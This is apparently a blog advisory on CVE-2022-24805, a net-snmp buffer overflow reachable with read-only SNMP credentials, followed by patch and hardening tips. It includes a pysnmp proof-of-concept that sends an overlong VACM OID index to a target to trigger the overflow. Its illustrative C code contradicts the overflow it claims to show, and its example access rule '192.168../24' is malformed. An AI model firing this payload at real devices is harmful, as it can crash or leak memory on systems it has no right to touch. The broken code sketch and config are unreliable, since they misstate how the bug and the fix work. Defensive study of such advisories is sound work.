CVE-2022-24805 - Easy to Exploit Buffer Overflow in net-snmp’s NET-SNMP-VACM-MIB

CVE-2022-24805 uncovers a serious vulnerability in net-snmp—a widely used toolkit for monitoring network devices via SNMP (Simple Network Management Protocol). This bug stems from unsafe handling of the INDEX field in the NET-SNMP-VACM-MIB, potentially causing a buffer overflow and out-of-bounds memory access. Shockingly, an attacker doesn't even need write privileges: read-only SNMP credentials are enough to exploit the flaw. This post unpacks the technical details, demonstrates exploitation basics, and offers practical protection steps.

What is net-snmp?

net-snmp is a popular suite providing SNMP libraries and command line programs like snmpget, snmpwalk, and snmpd. SNMP is commonly used for monitoring and managing routers, switches, printers, servers, or virtual devices.

Reference:
- Net-SNMP website

The Vulnerability Explained

CVE-2022-24805 (GitHub Advisory: GHSA-q2pr-55mw-72qq) affects net-snmp versions before 5.9.2.

An attacker sends a maliciously crafted SNMP query.

- The SNMP agent (the monitored device running net-snmp) reads past buffer boundaries, possibly crashing or leaking internal state.

Risk Level:
This flaw is *remotely exploitable* by anyone with valid SNMP credentials (even read-only!). The barrier to entry is low if credentials are weak or widely distributed.

The vulnerability exists in code that processes SNMP GET or WALK requests like this one

snmpwalk -v2c -c public <target-ip> NET-SNMP-VACM-MIB

But if an attacker crafts the OID (Object Identifier) in a certain way, they can overflow the buffer.

Imagine the vulnerable C code might look like this

char index[MAX_INDEX_LEN]; // static buffer
int index_len = request_index_length; // user-controlled

if (index_len <= MAX_INDEX_LEN) {
    memcpy(index, request_index, index_len); // no further checks!
} else {
    // supposed to handle error here, but skipped in old code
}

By sending an INDEX larger than MAX_INDEX_LEN, memory beyond index is overwritten, opening the door to segmentation faults or even code execution on some platforms.

Simple PoC using pysnmp

from pysnmp.hlapi import *

# Replace with victim’s IP and valid SNMP community
target = '192.168.1.100'
community = 'public'
# OID for VACM securityToGroupTable with overlong index
malicious_oid = (1,3,6,1,4,1,8072,1,3,2,1,2) + (255,)*32  # 32+ bytes

errorIndication, errorStatus, errorIndex, varBinds = next(
    getCmd(
        SnmpEngine(),
        CommunityData(community, mpModel=1), # SNMP v2c
        UdpTransportTarget((target, 161)),
        ContextData(),
        ObjectType(ObjectIdentity(malicious_oid))
    )
)
if errorIndication:
    print(errorIndication)

This code asks net-snmp for an OID with an abnormally long index, aiming to overflow the internal buffer.

Exploitability

- SNMPv1/v2c only require a “community string” (like a weak password).

What Fixed the Bug?

net-snmp 5.9.2 patched these unsafe memory operations.
See commit: net-snmp/net-snmp@201f51a

Example SNMPD config restricting access

rocommunity VHn84U3f7hwZ 192.168../24

This allows read-only SNMP from your internal LAN only.

More Information

- Upstream Net-SNMP Advisory
- NVD entry for CVE-2022-24805
- VacmSecurityToGroupTable MIB details (OID)

Conclusion

CVE-2022-24805 is a stark reminder of how a small parsing bug in widely used protocols like SNMP can open the door to attacks—often with just read-only credentials. Always lock down monitoring interfaces, use the newest versions, and keep SNMP credentials secret and strong!


*Stay safe out there and always audit your network monitoring stack!*

Timeline

Published on: 04/16/2024 20:15:07 UTC